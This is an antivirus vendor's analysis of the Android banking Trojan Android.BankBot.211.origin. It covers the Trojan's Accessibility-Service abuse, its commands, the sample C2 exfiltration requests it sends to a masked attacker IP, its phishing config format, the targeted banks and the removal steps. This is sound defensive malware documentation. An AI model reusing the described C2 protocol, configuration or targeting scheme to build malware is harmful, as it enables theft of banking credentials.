Защити созданное

Другие наши ресурсы

Закрыть

Библиотека
Моя библиотека

+ Добавить в библиотеку

Поддержка
Круглосуточная поддержка

Позвоните

Глобальная поддержка:
+7 (495) 789-45-86
Локальная тех.поддержка:
+380 (44) 224-41-60

Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Профиль

Android.BankBot.211.origin

Добавлен в вирусную базу Dr.Web:2017-07-20
Описание добавлено:2017-07-20

SHA1:

1fac76cff16887f695f557d849650cf10bcb1adb

A malicious program for Android mobile devices. Banking Trojan for Android that steals confidential information and executes cybercriminals’ commands. Android.BankBot.211.origin is distributed under the guise of benign programs.

Once installed and launched, in an infinite loop, Android.BankBot.211.origin tries to gain access to the Accessibility Service mode by blocking device operation with a window with the corresponding request.

#drweb #drweb #drweb

After the user is forced to grant the Trojan the necessary rights, Android.BankBot.211.origin adds itself to the mobile device administrator list and assigns itself as the default SMS manager and gains access to the screen capturing functions (class MediaProjection is used for this purpose). Each indicated action requires user’s consent, however, after obtaining access to the Accessibility Service, the malicious program does it automatically by independently clicking confirmation buttons.

#drweb #drweb #drweb

If the device’s owner attempts to remove the Trojan from the administrator list, Android.BankBot.211.origin will automatically click “Cancel”. In other cases, it clicks “Back” using the performGlobalAction method.

After the successful device infection, the Trojan reports this information to the command and control server by sending the request that looks the following way:

POST http://217.***.***.92/v83a59w4h/s991802.php HTTP/1.1
Content-Length: 96
Content-Type: application/x-www-form-urlencoded
Host: 217.***.***.92
Connection: Keep-Alive
action=reg&imei=86**********554&phone=&op=********&version=5.1%2C3.10.65-svn944&prefix=experience
Then it waits for the server’s commands:
POST http://217.***.***.92/v83a59w4h/s991802.php HTTP/1.1
Content-Length: 32
Content-Type: application/x-www-form-urlencoded
Host: 217.***.***.92
Connection: Keep-Alive
action=poll&imei=86**********554

The Trojan can execute the following commands:

  • number_1/prefix_1—send an SMS with the text from the parameter prefix_1 to the number from the parameter number_1;
  • call_log—forward to the server information about the installed applications, contact list and phone call data;
  • sms_history—send to the server SMS stored in the device memory;
  • url—open the specified link;
  • server—change the address of the command and control server;
  • intercept—add to the table reservas the parameters phones and obtained values of phone numbers;
  • server_poll—add to the table reservas the parameters interval and obtained values.

Besides that, Android.BankBot.211.origin intercepts and sends to the server information about all incoming messages.

The Trojan periodically connects to its command and control server using the address http://217.***.***.92/jack.zip. The archive located through the link contains an ordinary text file. Android.BankBot.211.origin can send a POST request that looks the following way:

POST http://217.***.***.92/jack.zip HTTP/1.1
User-Agent: Dalvik/2.1.0 (Linux; U; Android 5.1; [device model] Build/LMY47D)
Host: 217.***.***.92
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
_AUTH=86**********554

As a response, the malicious program receives a configuration file encrypted with the AES algorithm. This file contains the parameters of the attack on the applications installed on the device. There are also names of targeted programs, link to parameters of phishing forms and the type of the executed action. Example:

config 
[
{
"name" : "lock_av",
"type" : "lock",
"link" : "no_link",
"apps" : ["com.kms.free", "com.drweb", "screenmirroring.agillaapps.com.screenmirroring", "com.huawei.android.mirrorshare", "com.antivirus", "com.eset.ems2.gp"],
"s_flow" : 1
}, {
"name" : "google_play",
"type" : "window",
"link" : "http://217.***.***.92/link/GooglePlay2/index.html",
"apps" : ["com.google.android.finsky.activities", "com.google.android.music", "com.android.vending"],
"s_flow" : 2
}, {
"name" : "Akbank",
"type" : "fullscreen",
"link" : "http://217.***.***.92/link/Akbank/index.html",
"apps" : ["com.akbank.android.apps.akbank_direkt", "com.akbank.softotp"],
"s_flow" : 2
}
]

where:

  • lock—attack on anti-virus programs and other software that can interfere with the Trojan’s operation (when such applications are launched, Android.BankBot.211.origin automatically clicks “Back”);
  • window—display of a phishing settings window of a payment service that requests bank card information;
  • fullscreen—display of a phishing window for input of login credentials during the launch of applications for operation with mobile banking and payment systems.

The Trojan displays phishing input forms during the launch of the following applications:

  • com.akbank.android.apps.akbank_direkt – Akbank Direkt;
  • com.akbank.softotp – Akbank Direkt Şifreci;
  • com.finansbank.mobile.cepsube – QNB Finansbank Cep Şubesi;
  • com.garanti.cepsubesi – Garanti Mobile Banking;
  • com.garanti.cepbank – Garanti CepBank;
  • biz.mobinex.android.apps.cep_sifrematik – Garanti Cep Şifrematik;
  • com.pozitron.iscep – İşCep;
  • com.ykb.android – Yapı Kredi Mobile;
  • com.ziraat.ziraatmobil – Ziraat Mobil;
  • com.dbs.sg.dbsmbanking – DBS digibank SG;
  • com.dbs.sg.posbmbanking – POSB digibank SG;
  • com.dbs.dbspaylah – DBS PayLah!;
  • com.dbshk – DBS mBanking Hong Kong;
  • com.dbs.businessclass – DBS BusinessClass;
  • com.dbs.quickcredit.sg – DBS Quick Credit;
  • de.comdirect.android – comdirect mobile App;
  • de.commerzbanking.mobil – Commerzbank Banking App;
  • de.consorsbank – Consorsbank;
  • com.db.mm.deutschebank – Meine Bank;
  • de.dkb.portalapp – DKB-Banking;
  • com.ing.diba.mbbr2 – ING-DiBa Banking + Brokerage;
  • de.postbank.finanzassistent – Postbank Finanzassistent;
  • mobile.santander.de – Santander MobileBanking;
  • com.starfinanz.smob.android – Sparkasse;
  • de.fiducia.smartphone.android.banking.vr – VR-Banking;
  • pl.mbank – mBank PL;
  • eu.eleader.mobilebanking.pekao – Bank Pekao;
  • pl.pkobp.iko – IKO;
  • com.comarch.mobile – Alior Mobile;
  • com.getingroup.mobilebanking – Getin Mobile;
  • pl.ing.ingmobile – INGMobile;
  • pl.ing.mojeing – Moje ING mobile;
  • org.banksa.bank – BankSA Mobile Banking;
  • com.ifs.banking.fiid3767 – BANKWEST OF KANSAS;
  • com.commbank.netbank – CommBank;
  • com.cba.android.netbank – CommBank app for tablet;
  • au.com.ingdirect.android – ING DIRECT Australia Banking;
  • au.com.nab.mobile – NAB;
  • org.stgeorge.bank – St.George Mobile Banking;
  • org.banking.tablet.stgeorge – St.George Tablet Banking;
  • org.westpac.bank – Westpac Mobile Banking;
  • fr.creditagricole.androidapp – Ma Banque;
  • fr.axa.monaxa – Mon AXA;
  • fr.banquepopulaire.cyberplus – Banque Populaire;
  • net.bnpparibas.mescomptes – Mes Comptes BNP Paribas;
  • com.boursorama.android.clients – Boursorama Banque;
  • com.caisseepargne.android.mobilebanking – Banque;
  • fr.lcl.android.customerarea – Mes Comptes – LCL pour mobile;
  • mobi.societegenerale.mobile.lappli – L'Appli Société Générale;
  • uk.co.bankofscotland.businessbank – Bank of Scotland Business;
  • com.grppl.android.shell.BOS – Bank of Scotland Mobile Bank;
  • com.barclays – Barclays Mobile Banking;
  • com.grppl.android.shell.halifax – Halifax Mobile Banking app;
  • com.htsu.hsbcpersonalbanking – HSBC Mobile Banking;
  • com.grppl.android.shell.CMBlloydsTSB73 – Lloyds Bank Mobile Banking;
  • com.lloydsbank.businessmobile – Lloyds Bank Business;
  • santander – Santander;
  • com.ifs.banking.fiid4202 – TSBBank Mobile Banking;
  • com.fi6122.godough – TSB Mobile;
  • com.rbs.mobile.android.ubr – Ulster Bank ROI;
  • com.rbs.mobile.android.natwestoffshore – NatWest Offshore;
  • com.rbs.mobile.android.natwest – NatWest;
  • com.rbs.mobile.android.natwestbandc – NatWest Business Banking;
  • com.speedway.mobile – Speedway Fuel & Speedy Rewards;
  • com.paypal.android.p2pmobile – PayPal;
  • com.ebay.mobile – eBay;
  • com.google.android.music – Google Play Music;
  • com.android.vending – Google Play.

Android.BankBot.211.origin interferes with the operation of the following programs:

  • com.drweb – Dr.Web Security Space;
  • com.kms.free – Kaspersky Mobile Antivirus;
  • screenmirroring.agillaapps.com.screenmirroring – Screen Mirroring Assistant;
  • com.huawei.android.mirrorshare –无线分享;
  • com.antivirus – AVG AntiVirus;
  • com.eset.ems2.gp – ESET32 – ESET Mobile Security & Antivirus.

Examples of the fraudulent input forms and phishing windows Android.BankBot.211.origin can display:

#drweb #drweb #drweb
#drweb #drweb #drweb

The Trojan collects information about all launched applications and user’s actions performed within them. To do that, it tracks the following AccessibilityEvent events:

  • TYPE_VIEW_TEXT_CHANGED;
  • TYPE_VIEW_FOCUSED;
  • TYPE_VIEW_LONG_CLICKED;
  • TYPE_NOTIFICATION_STATE_CHANGED;
  • TYPE_VIEW_SELECTED;
  • TYPE_WINDOW_STATE_CHANGED;
  • TYPE_VIEW_CLICKED.

It allows the malicious program to track available text fields in programs, such as menu elements, it can also log key strokes and other components of the user interface. The obtained data is sent to the command and control server. Example of the sent information:

POST http://217.***.***.92/v83a59w4h/s991802.php HTTP/1.1
Content-Length: 708
Content-Type: application/x-www-form-urlencoded
Host: 217.***.***.92
Connection: Keep-Alive
action=grabbed_data&imei=86**********554&data={"app":"com.sprd.fileexplorer","report":"Grabbed: com.sprd.fileexplorer\nState: TYPE_WINDOW_STATE_CHANGED\nData: [radio] Быстрый просмотр\n[text] Аудио\n[text] Изображения\n[text] Видео\n[text] Документация\n[text] Приложения\n[text] \/storage\/emulated\/0\n[text] Alarms\n[text] Дата:2015-01-01 03:16:44\n[text] Android\n[text] Дата:2015-01-01 03:17:07\n[text] com.kingroot.kinguser\n[text] Дата:2017-07-11 13:27:37\n[text] DCIM\n[text] Дата:2017-07-11 13:27:45\n[text] documents\n[text] Дата:2017-07-07 14:09:51\n[text] Download\n[text] Дата:2017-07-13 12:27:54\n[text] Fonts\n[text] Дата:2017-07-12 18:33:49\n[text] Kingroot\n[text] Дата:2017-07-07 14:34:11"}

Besides that, Android.BankBot.211.origin tracks the operation of keyboard and steals the input user’s data. On each key stroke, the Trojan makes a screenshot and sends the obtained images to the command and control server. It allows malicious program to steal passwords as well, and it is quick enough to save them before they are hidden. Data which is input via visible fields is duplicated in the sent POST request.

#drweb #drweb

The Trojan prevents its removal and doesn’t allow to disable the access to its obtained extended functions. To get rid of Android.BankBot.211.origin, it is necessary to perform the following actions:

  • Load an infected device in safe mode;
  • Log into system settings and go to the list of administrators;
  • Find the Trojan in this list and recall the corresponding rights (here Android.BankBot.211.origin will display a warning about the inevitable loss of all important data, but it is only a decoy);
  • Restart the device, perform its full scan with an anti-virus and remove the Trojan after the scanning is complete.

News about the Trojan

Рекомендации по лечению


Android

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно

На 14 дней

Российский разработчик антивирусов Dr.Web

Опыт разработки с 1992 года

Dr.Web пользуются в 200+ странах мира

Поставка антивируса как услуги с 2007 года

Круглосуточная поддержка на русском языке

© «Доктор Веб»
2003 — 2018

«Доктор Веб» — российский производитель антивирусных средств защиты информации под маркой Dr.Web. Продукты Dr.Web разрабатываются с 1992 года.